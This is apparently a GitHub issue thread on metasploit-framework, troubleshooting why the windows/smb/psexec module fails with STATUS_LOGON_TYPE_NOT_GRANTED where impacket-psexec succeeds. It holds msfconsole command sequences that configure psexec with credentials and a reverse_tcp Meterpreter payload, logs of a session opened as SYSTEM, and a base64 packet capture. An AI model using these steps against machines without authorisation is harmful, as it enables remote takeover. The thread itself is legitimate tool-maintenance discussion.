metasploit-framework
metasploit-framework copied to clipboard
rapid7
exploit/windows/smb/psexec does not work while impacket-psexec does
Why does exploit/windows/smb/psexec react different from impacket-psexec? Shouldnt they do the same thing?
impacket-psexec "loca:Pass"@172....
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 172.....
[*] Found writable share ADMIN$
[*] Uploading file fPZKRTEM.exe
[*] Opening SVCManager on 172.....
[*] Creating service tQTR on 172.....
[*] Starting service tQTR.....
[!] Press help for extra shell commands Microsoft Windows [Version 10.0.16299.192]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>
use exploit/windows/smb/psexec
set rhosts 172...
set lhost tap0
set smbuser loca
set smbpass Pass
run
[*] Started reverse TCP handler on 17...:4444
[*] 172....:445 - Connecting to the server...
[*] 172....:445 - Authenticating to 172...:445 as user 'loca'...
[-] 172....:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000015b) STATUS_LOGON_TYPE_NOT_GRANTED: A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network.
[*] Exploit completed, but no session was created.
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
![github-actions[bot] avatar](https://avatars.githubusercontent.com/in/15368?v=4 "Published by a pub.dev verified publisher"){kind=small}
It looks like there's not enough information to replicate this issue. Please provide any relevant output and logs which may be useful in diagnosing the issue.
This includes:
- All of the item points within this tempate
- The result of the
debugcommand in your Metasploit console - Screenshots showing the issues you're having
- Exact replication steps
The easier it is for us to replicate and debug an issue means there's a higher chance of this issue being resolved.
cc @cdelafuente-r7 - I'm not sure if there's enough detail to replicate the original issue, but does anything pop out to you as being different maybe? 🤔
I just tested against Windows 10 version 20H2 and could not reproduce the issue:
msf6 exploit(windows/smb/psexec) > options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS <redacted_ip> yes The target host(s), range CIDR identifier, or hosts file with sy
ntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) o
r a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass <redacted> no The password for the specified username
SMBUser smbtest no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST <redacted_ip> yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/smb/psexec) > set verbose true
verbose => true
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on <redacted_ip>:4444
[*] <redacted_ip>:445 - Connecting to the server...
[*] <redacted_ip>:445 - Authenticating to <redacted_ip>:445 as user 'smbtest'...
[!] <redacted_ip>:445 - No active DB -- Credential data will not be saved!
[*] <redacted_ip>:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] <redacted_ip>:445 - PowerShell found
[*] <redacted_ip>:445 - Selecting PowerShell target
[*] <redacted_ip>:445 - Powershell command length: 2463
[*] <redacted_ip>:445 - Executing the payload...
[*] <redacted_ip>:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:<redacted_ip>[\svcctl] ...
[*] <redacted_ip>:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:<redacted_ip>[\svcctl] ...
[*] <redacted_ip>:445 - Obtaining a service manager handle...
[*] <redacted_ip>:445 - Creating the service...
[+] <redacted_ip>:445 - Successfully created the service
[*] <redacted_ip>:445 - Starting the service...
[+] <redacted_ip>:445 - Service start timed out, OK if running a command or non-service executable...
[*] <redacted_ip>:445 - Removing the service...
[+] <redacted_ip>:445 - Successfully removed the service
[*] <redacted_ip>:445 - Closing service handle...
[*] Sending stage (175174 bytes) to <redacted_ip>
[*] Meterpreter session 1 opened (<redacted_ip>:4444 -> <redacted_ip>:50158) at 2021-06-08 18:36:12 +0200
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-UUQE0B4
OS : Windows 10 (10.0 Build 19042).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
@friedrico, that would be great if we could have more details to help us reproduce the issue. Also, a PCAP would be useful. Since SMBv3 with encryption is used by default, please disable encryption with this option to get meaningful packet capture:
set SMB::AlwaysEncrypt false
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Hi again!
It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Sorry, havent had time.
I just repeated the actions - still the same problem. Even if I used set SMB::AlwaysEncrypt false
Module/Datastore
The following global/module datastore, and database setup was configured before the issue occurred:
Collapse
[framework/ui/console]
ActiveModule=exploit/windows/smb/psexec
[windows/smb/psexec]
WfsDelay=10
EXITFUNC=thread
WORKSPACE=
VERBOSE=true
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
RHOSTS=172...
RPORT=445
SSL=false
SSLVersion=Auto
SSLVerifyMode=PEER
SSLCipher=
Proxies=
CPORT=
CHOST=
ConnectTimeout=10
TCP::max_send_size=0
TCP::send_delay=0
DCERPC::max_frag_size=4096
DCERPC::fake_bind_multi=true
DCERPC::fake_bind_multi_prepend=0
DCERPC::fake_bind_multi_append=0
DCERPC::smb_pipeio=rw
DCERPC::ReadTimeout=10
NTLM::UseNTLMv2=true
NTLM::UseNTLM2_session=true
NTLM::SendLM=true
NTLM::UseLMKey=false
NTLM::SendNTLM=true
NTLM::SendSPN=true
SMB::pipe_evasion=false
SMB::pipe_write_min_size=1
SMB::pipe_write_max_size=1024
SMB::pipe_read_min_size=1
SMB::pipe_read_max_size=1024
SMB::pad_data_level=0
SMB::pad_file_level=0
SMB::obscure_trans_pipe_level=0
SMBDirect=true
SMBUser=loca
SMBPass=pass
SMBDomain=.
SMBName=*SMBSERVER
SMB::VerifySignature=false
SMB::ChunkSize=500
SMB::Native_OS=Windows 2000 2195
SMB::Native_LM=Windows 2000 5.0
SMB::ProtocolVersion=1,2,3
SMB::AlwaysEncrypt=false
SERVICE_NAME=
SERVICE_DISPLAY_NAME=
SERVICE_DESCRIPTION=
SERVICE_PERSIST=false
Powershell::persist=false
Powershell::prepend_sleep=
Powershell::prepend_protections_bypass=true
Powershell::strip_comments=true
Powershell::strip_whitespace=false
Powershell::sub_vars=true
Powershell::sub_funcs=false
Powershell::exec_in_place=false
Powershell::exec_rc4=false
Powershell::remove_comspec=false
Powershell::noninteractive=true
Powershell::encode_final_payload=false
Powershell::encode_inner_payload=false
Powershell::wrap_double_quotes=true
Powershell::no_equals=false
Powershell::method=reflection
EXE::EICAR=false
EXE::Custom=
EXE::Path=
EXE::Template=
EXE::Inject=false
EXE::OldMethod=false
EXE::FallBack=false
MSI::EICAR=false
MSI::Custom=
MSI::Path=
MSI::Template=
MSI::UAC=false
SMBSHARE=
ALLOW_GUEST=false
SERVICE_FILENAME=
PSH_PATH=Windows\System32\WindowsPowerShell\v1.0\powershell.exe
SERVICE_STUB_ENCODER=
CMD::DELAY=3
PAYLOAD=windows/meterpreter/reverse_tcp
LHOST=tap0
History
The following commands were ran during the session and before this issue occurred:
Collapse
2000 use exploit/windows/smb/psexec
2001 set smbuser loca
2002 set smbpass pass
2003 set rhosts 172...
2004 set lhost tap0
2005 set verbose true
2006 set SMB::AlwaysEncrypt false
2007 run
2008 debug
Framework Errors
The following framework errors occurred before the issue occurred:
Collapse
...
[09/28/2021 04:22:06] [e(0)] core: Exploit failed (windows/smb/psexec): Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000015b) STATUS_LOGON_TYPE_NOT_GRANTED: A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network. - Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000015b) STATUS_LOGON_TYPE_NOT_GRANTED: A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network.
Web Service Errors
The following web service errors occurred before the issue occurred:
Collapse
msf-ws.log does not exist.
Framework Logs
The following framework logs were recorded before the issue occurred:
Collapse
...
[09/28/2021 04:19:30] [d(0)] core: HistoryManager.pop_context name: :msfconsole
[09/28/2021 04:19:36] [d(0)] core: HistoryManager.push_context name: :msfconsole
[09/28/2021 04:20:05] [d(0)] core: HistoryManager.pop_context name: :msfconsole
[09/28/2021 04:20:10] [d(0)] core: HistoryManager.push_context name: :msfconsole
[09/28/2021 04:20:53] [d(0)] core: HistoryManager.pop_context name: :msfconsole
[09/28/2021 04:20:58] [d(0)] core: HistoryManager.push_context name: :msfconsole
[09/28/2021 04:22:05] [d(0)] core: SMB version(s) to negotiate: [1, 2, 3]
[09/28/2021 04:22:06] [d(0)] core: Negotiated SMB version: SMB3
[09/28/2021 04:22:06] [e(0)] core: Exploit failed (windows/smb/psexec): Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000015b) STATUS_LOGON_TYPE_NOT_GRANTED: A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network. - Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000015b) STATUS_LOGON_TYPE_NOT_GRANTED: A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network.
Web Service Logs
The following web service logs were recorded before the issue occurred:
Collapse
msf-ws.log does not exist.
Version/Install
The versions and install method of your Metasploit setup:
Collapse
Framework: 6.1.7-dev
Ruby: ruby 2.7.4p191 (2021-07-07 revision a21a3b7d23) [x86_64-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: Connected to msf. Connection type: postgresql.
Install Method: Other - Please specify
base64(pcap):
sanitized
base64 -d <<< BASE64STR > my.pcap
Collapse
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
Can I unclose the issue?
@friedrico Thanks for the update :+1: Just as an additional datapoint - what was the target OS, i.e. output of systeminfo?
@friedrico Thanks for the update +1 Just as an additional datapoint - what was the target OS, i.e. output of
systeminfo?
meterpreter > sysinfo
Computer : WIN7
OS : Windows 10 (10.0 Build 16299).
Architecture : x64
System Language : en_US
Domain : ...
Logged On Users : 6
Meterpreter : x86/windows
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Hi again!
It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Beep boop, I think the inactivity bot closed this one erroneously. Can we re-open?
This is still affecting recent systems -- here's a Windows 10 target example with the output of systeminfo:
meterpreter > execute -if "systeminfo"
Process 6836 created.
Channel 4 created.
Host Name: irrelevant
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.19044 N/A Build 19044
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00329-10181-97955-AA169
Original Install Date: 5/3/2022, 11:35:25 PM
System Boot Time: 11/11/2022, 6:44:39 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 142 Stepping 9 GenuineIntel ~3504 Mhz
[02]: Intel64 Family 6 Model 142 Stepping 9 GenuineIntel ~3504 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC) Coordinated Universal Time
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,468 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 3,350 MB
Virtual Memory: In Use: 1,449 MB
Metasploit version:
msfconsole -qx 'version'
Framework: 6.0.27-dev-
Console : 6.0.27-dev-
Tagging @adfoster-r7 (like a jerk) since I'm not sure how notifications work on closed issues.
@jeffmcjunkin Thanks for the ping; I grabbed friedrico's pcap and it seems like it might be an issue when using psexec with a local admin. Google's hinting that it might be a difference between using psexec and psexec -i for interactive logons versus network logon - but I haven't found the right gpo/priv incantations to replicate the error
If there's more details for how to create an env to reproduce this error that would be appreciated 💯
Edit: I added a user to the Deny access to this computer from the network gpo and got the STATUS_LOGON_TYPE_NOT_GRANTED error:
msf6 exploit(windows/smb/psexec) > run smb://admin_without_remote:[email protected]
[*] Started reverse TCP handler on 192.168.123.1:4444
[*] 192.168.123.13:445 - Connecting to the server...
[*] 192.168.123.13:445 - Authenticating to 192.168.123.13:445|testing as user 'admin_without_remote'...
[-] 192.168.123.13:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000015b) STATUS_LOGON_TYPE_NOT_GRANTED: A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network.
[*] Exploit completed, but no session was created.
but impacket didn't work either, so I'm probably close to the right area - but still haven't fully replicated yet 🤔
python3 ~/Documents/code/impacket/examples/psexec.py 'admin_without_remote:[email protected]'
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation
[-] SMB SessionError: STATUS_LOGON_TYPE_NOT_GRANTED(A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network.)
Tagging @joswr1ght who has encountered this issue as well, and I think can replicate it at will.
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
